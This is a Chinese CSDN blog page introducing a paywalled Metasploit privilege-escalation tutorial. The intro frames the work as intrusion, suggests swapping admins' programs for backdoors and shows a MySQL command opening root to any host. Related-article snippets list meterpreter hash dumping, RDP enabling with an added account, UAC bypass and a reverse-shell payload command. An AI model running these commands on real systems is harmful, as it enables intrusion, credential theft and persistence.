Metasploit 权限提升(炊少教学)

最新推荐文章于 2023-11-10 15:31:42 发布
最新推荐文章于 2023-11-10 15:31:42 发布
阅读量572 收藏
点赞数
分类专栏: 工具使用 web安全 文章标签: mysql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weiliang369/article/details/123157861
版权

前言

  现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)

  但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的guest权限,于是,如何拿到系统管理员或者是system权限,便显得日益重要了。

  于是,我就总结了一下大家所经常使用的几种提升权限的方法,以下内容是我整理的,没有什么新的方法,写给和我一样的菜鸟看的。高手们就可以略去了,当然,你要复习我不反对,顺便帮我查查有什么补充
恩,主要是针对数据库的。
如果对方没有你所能利用的服务,也可以替换对方管理员常用的程序,例如QQ,MSN等等,具体替换方法与替换服务一样,只是你的后门什么时候可以启动就得看你的运气了。
还有外部设备没说。。。。
还有改启动项木没说
好多好多懒得写了。。

Mysql数据库

首先得开启外联 WIndows

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'you password' WITH GRANT OPTION;

进行攻击

扫描一个主机<

了解本专栏 订阅专栏 解锁全文 超级会员免费看
信安微凉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
metasploit-学习9--显示payload的模块的所有payload信息
简单就是美
06-19 4564
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    ----------- aix/ppc/shell_bind_
Metasploit拿到shell后 低权限---提权篇
qq_58000413的博客
08-24 1483
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
Kali Linux渗透之Metasploit攻防实战技巧
04-12
一、课程概要       本课程主要分享Kali Linux渗透之Metasploit攻防实战技巧! 二、适合人员       1、大学生       2、IT技术员       3、运维工程师       4、服务器工程师       5、渗透测试工程师
Metasploit权限提升全剧终
Fly_鹏程万里
07-06 5409
0×01 引言通常,我们在渗透过程中很有可能只获得了一个系统的Guest或User权限。低的权限级别将会使我们受到很多的限制,所以必须将访问权限从Guset提升到User,再到Administrator,最后到SYSTEM级别。渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,或LINUX操作系统中root账户权限提升权限的方式分为两类。纵向提权:低权限角色获得高...
渗透测试必备工具--Metasploit(流程梳理与meterpreter权限分析)
最新发布
Welcome To Myon'Blog !
11-10 703
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 # 添加用户。run post/windows/gather/smart_hashdump # 从SAM导出密码哈希,execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。run post/windows/manage/enable_rdp # 开启远程桌面。ps # 查看当前活跃进程,kill 杀死进程。
metasploit-framework-6.3.34.zip
09-17
总结,Metasploit Framework 6.3.34是安全专业人士手中的强大武器,它能够帮助他们有效地识别和测试系统安全弱点,提升网络防御能力。然而,正确使用并理解其背后的伦理和法律责任至关重要。对于任何想深入研究网络...
metasploit
12-19
后渗透的多种方法,meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
炊少提权工具包
10-18
用来提权的工具,请不要用于违法行为 谢谢配合
Metasploit(后渗透攻击:权限提升
qq_41453632的博客
12-03 5762
    通常,我们在渗透攻击时很有可能只获得了一个系统的Guest或User权限。低的权限级别将使我们受到很多的限制,在实施横向渗透或者提权攻击时将很困难。在主机上如果没有管理者权限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问权限从Guset提升到User,再到Administrator,最后到System级别。    渗透的最终目的是获取服务器的最高...
Metasploit可执行后门
课嗨教育的专栏
06-20 401
他能生成LINUX WINDOWS PHP ASP JSP等等的后门哦 msfpayload as shellcode 查看全部列表 目前有:248 蛋 root@kali:/home/brk# msfpayload -l
Metasploit的本地漏洞利用
课嗨教育的专栏
04-05 193
这个很简单的理解,本地例如: RAR ZIP 播放器等等,当我们用MSF生成漏洞文件后,别人用特定的工具打开,就会中马 打开UB 1 ,我们来利用ZIP吧,启动METASPLOIT 搜索rar msf > search zip Matching Modules ================ Name Disclosure Date Rank Descriptio
Metasploit reverse Shell的免杀(炊少教学
weiliang369的博客
02-25 326
rootkithat是我以前的马甲 以前写的文章 我们先生成一个X64的WINDOWS XP 的reverse SHELL 1 2 root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/ meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe 提示:你可以用 scheduleme -m 1 -u e /tm
metasploit提升权限
热门推荐
星落的博客
05-24 1万+
实例演示-提权 1.获得system账号权限,直接获取会失败,以为win7以上版本电脑含有UAC,因此要绕过UAC。 getsystem 2.使用ask模块进行弹窗,受害人对电脑不了解,点击“是”,从而绕过UAC。 use exploit/windows/local/ask set session 1 run 受害者电脑会进行弹窗,点击允许,就可以提权了。 3.使用bypassuac模块,利用受信任的通过进程注入的发布者证书,他将产生一个关闭UAC标志的shell。 use ..
小迪渗透&权限提升(捌)
weixin_41665162的博客
09-03 1138
文章目录58. 网站权限后台漏洞第三方获取(58-64)具体有哪些权限需要我们知道和了解掌握的?演示案例: 58. 网站权限后台漏洞第三方获取(58-64) 当前知识点在渗透流程中的点 前面-中期-后期对应知识关系 当前知识点在权限提升的重点 知识点顺序,理解思路,分类介绍等 当前知识点权限提升权限介绍 注重理解当前权限对应可操作的事情 利用成功后的思想需要总结的思路 相关的操作被拒绝无法实现的时候就会涉及到权限提升 具体有哪些权限需要我们知道和了解掌握的? 后台权限,网站权限数据库权限,接口权限,系
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)
weixin_51803729的博客
02-12 5228
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)
提升渗透测试技能:Metasploit 3实战指南
"《精通Metasploit 第三版》是一本深入探讨网络安全与渗透测试技术的专业书籍,由Nipun Jaswal撰写,旨在帮助读者将他们的技能提升到新的水平。本书首先回顾了Metasploit的基本功能及其传统应用,让读者对这个强大的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信安微凉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值